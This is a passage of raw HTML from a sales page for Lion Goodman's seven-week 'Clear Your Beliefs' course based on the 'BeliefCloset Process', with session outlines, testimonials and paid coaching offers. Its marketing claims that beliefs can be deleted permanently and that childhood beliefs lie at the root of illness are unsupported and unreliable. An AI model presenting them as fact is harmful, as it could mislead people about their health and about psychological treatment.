new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div 